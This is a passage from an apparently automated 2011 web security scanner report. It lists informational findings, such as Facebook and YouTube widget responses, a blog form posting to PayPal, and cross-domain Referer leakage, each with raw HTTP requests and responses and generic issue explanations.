User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.222.116
X-Cnection: close
Date: Thu, 12 May 2011 13:28:13 GMT
Content-Length: 8625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe06d18d931b96883905" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widge
...[SNIP]...
11.14. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?id=94783579879&width=300&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.51.122
X-Cnection: close
Date: Thu, 12 May 2011 13:29:53 GMT
Content-Length: 8996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe0d1ec5dc8e06727816" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">2,324</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...

Request 2

GET /plugins/likebox.php?id=94783579879&width=300&connections=0&stream=false&header=false&height=62 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.109.103
X-Cnection: close
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 8962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe0f5ada951d60582267" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">2,324</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></sp
...[SNIP]...
11.15. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /widgets/like.php

Request 1

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.imdb.com/title/tt0758746/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.211.110
X-Cnection: close
Date: Thu, 12 May 2011 13:32:46 GMT
Content-Length: 7359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe17ec08542824047297" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Friday the 13th (2009)</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 932 others like this.</span><span class="connect_widget_not_connected_text">932 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=imdb.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">
...[SNIP]...

Request 2

GET /widgets/like.php?width=280&show_faces=1&layout=standard&href=http%3A%2F%2Fwww.imdb.com%2Ftitle%2Ftt0758746%2F HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2; lsd=LF24m

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.43.116
X-Cnection: close
Date: Thu, 12 May 2011 13:32:53 GMT
Elapsed: 0.053
Content-Length: 7250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe185e20cf8838356544" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>Friday the 13th (2009)</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You and 932 others like this.</span><span class="connect_widget_not_connected_text">932 likes. <a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id&amp;placement=like_button&amp;extra_2=US" target="_blank">Sign Up</a> to see what your friends like.</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page<
...[SNIP]...
11.16. http://www.youtube.com/embed/TVqe8ieqz10  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /embed/TVqe8ieqz10

Request 1

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://crenk.com/buy-chromebook/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=c0df1fc5fad584dccc67bc540e26ae88cwsAAAAzVVOtwdbzTcvguA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11186
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
g.com\/yt\/swfbin\/watch_as3-vflRkb4Mi.swf", "min_version": "7", "args": {"el": "embedded", "fexp": "913103", "use_fullscreen_popup": "1", "allow_embed": 1, "allow_ratings": 1, "hl": "en_US", "eurl": "http:\/\/crenk.com\/buy-chromebook\/", "iurl": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/hqdefault.jpg", "view_count": 181813, "title": "Introducing the Chromebook", "avg_rating": 4.88412340105, "video_id": "TVqe8ieqz10", "length_seconds": 110, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/maxresdefault.jpg", "enablejsapi": "0", "sk": "-bLTxB7LJ2kSB1Yi71TKR3A8grBAEf3ZC", "use_native_controls": false, "rel": "0", "jsapicallback": "yt.embed.onPlayerReady", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflAC9WK1.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflAC9WK1.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");


yt.embed.writeEmbed();
</script>



</body>
</html>

Request 2

GET /embed/TVqe8ieqz10?rel=0 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=s1z-YuDnG-Y; PREF=fv=10.2.154

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: GEO=fe7dcf092b2ef559e63b275006e90dd6cwsAAAAzVVOtwdbzTcvgug==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 11150
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Introducing the Chromebook</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflZITYGO.css">


</head>
<body>
<d
...[SNIP]...
g.com\/yt\/swfbin\/watch_as3-vflRkb4Mi.swf", "min_version": "7", "args": {"el": "embedded", "fexp": "913103", "use_fullscreen_popup": "1", "allow_embed": 1, "allow_ratings": 1, "hl": "en_US", "eurl": "", "iurl": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/hqdefault.jpg", "view_count": 181813, "title": "Introducing the Chromebook", "avg_rating": 4.88412340105, "video_id": "TVqe8ieqz10", "length_seconds": 110, "iurlmaxres": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/maxresdefault.jpg", "enablejsapi": "0", "sk": "-bLTxB7LJ2kSB1Yi71TKR3A8grBAEf3ZC", "use_native_controls": false, "rel": "0", "jsapicallback": "yt.embed.onPlayerReady", "iurlsd": "http:\/\/i1.ytimg.com\/vi\/TVqe8ieqz10\/sddefault.jpg"}, "url_v9as2": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflAC9WK1.swf", "params": {"allowscriptaccess": "always", "allowfullscreen": "true", "bgcolor": "#000000"}, "attrs": {"width": "100%", "id": "video-player", "height": "100%"}, "url_v8": "http:\/\/s.ytimg.com\/yt\/swfbin\/cps-vflAC9WK1.swf"},
'ORIGIN': "*",
'IS_OPERA_MOBILE': false,
'IS_HTML5_MOBILE_DEVICE': false
});
yt.setMsg({
'FLASH_UPGRADE': '<div class=\"yt-alert yt-alert-error yt-alert-player yt-rounded \"><img src=\"\/\/s.ytimg.com\/yt\/img\/pixel-vfl3z5WfW.gif\" class=\"icon master-sprite\" alt=\"Alert icon\"><div class=\"yt-alert-content\"> You need to upgrade your Adobe Flash Player to watch this video. <br> <a href=\"http:\/\/get.adobe.com\/flashplayer\/\">Download it from Adobe.<\/a>\n<\/div><\/div>'
});
yt.setMsg('HTML5_DEFAULT_FALLBACK', "Your browser does not currently recognize any of the video formats available.\u003cbr\u003e\u003ca href=\"\/html5\"\u003eClick here to visit our frequently asked questions about HTML5 video.\u003c\/a\u003e");


yt.embed.writeEmbed();
</script>



</body>
</html>
12. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://orangeorb.blogspot.com
Path:   /2011/05/planets-align-on-friday-13th-and.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /2011/05/planets-align-on-friday-13th-and.html HTTP/1.1
Host: orangeorb.blogspot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Set-Cookie: blogger_TID=17729b14830bec26; HttpOnly
Expires: Thu, 12 May 2011 13:32:05 GMT
Date: Thu, 12 May 2011 13:32:05 GMT
Cache-Control: private
Last-Modified: Thu, 12 May 2011 02:55:21 GMT
ETag: "4620d68b-a3e9-47d6-9e38-877ac81cebcb"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 155467

<!DOCTYPE html>
<html b:version='2' class='v2' dir='ltr'>
<head>
<meta content='IE=EmulateIE7' http-equiv='X-UA-Compatible'/>
<meta content='width=1100' name='viewport'/>
<meta content='text/html; cha
...[SNIP]...
<div class='widget-content'>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick" />
...[SNIP]...
13. Cross-domain Referer leakage  previous  next
There are 78 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

13.1. http://0.tqn.com/0g/js/cj017x14t421p9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://0.tqn.com
Path:   /0g/js/cj017x14t421p9.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /0g/js/cj017x14t421p9.js?rdv=j23 HTTP/1.1
Host: 0.tqn.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Age: 3516914
Date: Fri, 01 Apr 2011 20:35:46 GMT
Expires: Mon, 29 Mar 2021 20:35:46 GMT
Cache-Control: max-age=315360000
Connection: Keep-Alive
ETag: "KXDIJCDIDLTTUNUX"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Keep-Alive: timeout=15, max=97
Content-Type: application/x-javascript
Content-Length: 41649

zAD=new Stk();zh='http://';zai=0;zop=0;zIgs=this.gs&&gs.length;zwl=window.location;zWl=zTr(zwl.href,'?');zOfsL=zs=-1;zGSk=9
q='>';zg=zCn=zSbL=zAc=zGARF=zDMN=zPxzTL=0;z0=zpT=zast=zChA=zAds=zKW='';d=do
...[SNIP]...
<a href="java'+sc+':zOs(0,'+n+')"><img src="http://z.about.com/f/bt/'+g+'.gif" border=0 /></a>
...[SNIP]...
<a href="'+nw.href+'"><img src="http://z.about.com/f/bt/'+g+'.gif" alt="'+d+'" border="0" /></a>
...[SNIP]...
</span>, <a href="http://membership.about.com/memreg?action=logoff&successurl='+window.location+"&surlanchor=%23lis&cob="+gs+"&product="+K+'" onclick="return do_logout(this.href,\''+K+"');\">click here</a>
...[SNIP]...
</em>';C.innerHTML='<a href="http://www.about.com/gi/pages/login.htm" onclick="return prep_modal(this.href);">Login with Membername</a> or <a href="http://login.about.com/registration.htm?successurl='+window.location+"&surlanchor=%23lis&cob="+gs+"&product="+K+'">Register</a>
...[SNIP]...
var A=encodeURIComponent("Check out "+gEI("abt").getElementsByTagName("h1")[0].innerText+" on About.com:");getElementsByClassName("sm",gEI("abm"))[D].getElementsByTagName("a")[0].parentNode.innerHTML='<iframe src="http://platform.twitter.com/widgets/tweet_button.html?url='+location.href+"&amp;text="+A+'&amp;count=horizontal" scrolling="no" frameborder="0" allowTransparency="true" ref=""+zTt+"" onload="frameLoad(this);"></iframe>
...[SNIP]...
13.2. http://9.mshcdn.com/wp-content/themes/v7/js/core.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://9.mshcdn.com
Path:   /wp-content/themes/v7/js/core.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /wp-content/themes/v7/js/core.js?1303775150 HTTP/1.1
Host: 9.mshcdn.com
Proxy-Connection: keep-alive
Referer: http://mashable.com/2011/05/11/google-chrome-notebooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 25 Apr 2011 23:45:50 GMT
ETag: "135eb74-73b7-4a1c6ceaec780"
Content-Type: application/x-javascript
Vary: Accept-Encoding
X-Cacheable: Yes
Date: Thu, 12 May 2011 13:28:26 GMT
X-Served-By: web1
X-Cache-Hits: 0
Accept-Ranges: bytes
Cache-Control: private, max-age=259200
Age: 135705
Expires: Fri, 13 May 2011 23:46:41 GMT
x-cdn: Served by Cotendo
Connection: Keep-Alive
Content-Length: 29623

// ===========
// = PLUGINS =
// ===========
